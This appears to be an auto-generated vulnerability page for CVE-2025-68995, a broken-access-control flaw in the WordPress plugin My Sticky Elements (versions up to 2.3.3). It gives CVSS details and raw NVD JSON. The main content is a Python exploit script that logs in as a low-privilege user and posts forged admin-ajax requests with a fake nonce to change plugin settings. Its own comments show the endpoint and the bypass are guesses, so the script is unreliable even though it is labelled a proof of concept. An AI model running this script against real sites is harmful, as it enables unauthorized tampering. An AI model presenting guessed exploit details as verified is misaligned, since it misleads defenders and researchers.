Security Vulnerability Report
中文
CVE-2025-68995 CVSS 4.3 MEDIUM

CVE-2025-68995

Published: 2025-12-30 11:15:58
Last Modified: 2026-04-27 19:16:41

Description

Missing Authorization vulnerability in Premio My Sticky Elements mystickyelements allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects My Sticky Elements: from n/a through <= 2.3.3.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

My Sticky Elements <= 2.3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-68995 PoC - My Sticky Elements Broken Access Control # Target: WordPress site with My Sticky Elements plugin <= 2.3.3 def exploit_cve_2025_68995(target_url, username, password): """ Exploit for Missing Authorization vulnerability in My Sticky Elements plugin This PoC demonstrates how a low-privilege user can access admin functions """ session = requests.Session() # Step 1: Login as low-privilege user login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } resp = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful as low-privilege user") # Step 2: Try to access admin function without proper authorization # Common vulnerable endpoint in My Sticky Elements admin_ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Try to access settings or configuration function exploit_data = { 'action': 'mystickyelements_ajax_action', 'nonce': 'exploit', # May not be properly validated 'mystickyelements_option': 'settings', 'mystickyelements_value': 'malicious_value' } resp = session.post(admin_ajax_url, data=exploit_data) if resp.status_code == 200: print("[!] Access control bypass successful - low privilege user accessed admin function") print(f"[+] Response: {resp.text[:500]}") return True else: print("[-] Exploit failed or access was properly denied") return False if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print("Example: python exploit.py http://example.com lowprivuser password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_cve_2025_68995(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68995", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:15:58.317", "lastModified": "2026-04-27T19:16:40.743", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Premio My Sticky Elements mystickyelements allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects My Sticky Elements: from n/a through <= 2.3.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/mystickyelements/vulnerability/wordpress-my-sticky-elements-plugin-2-3-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}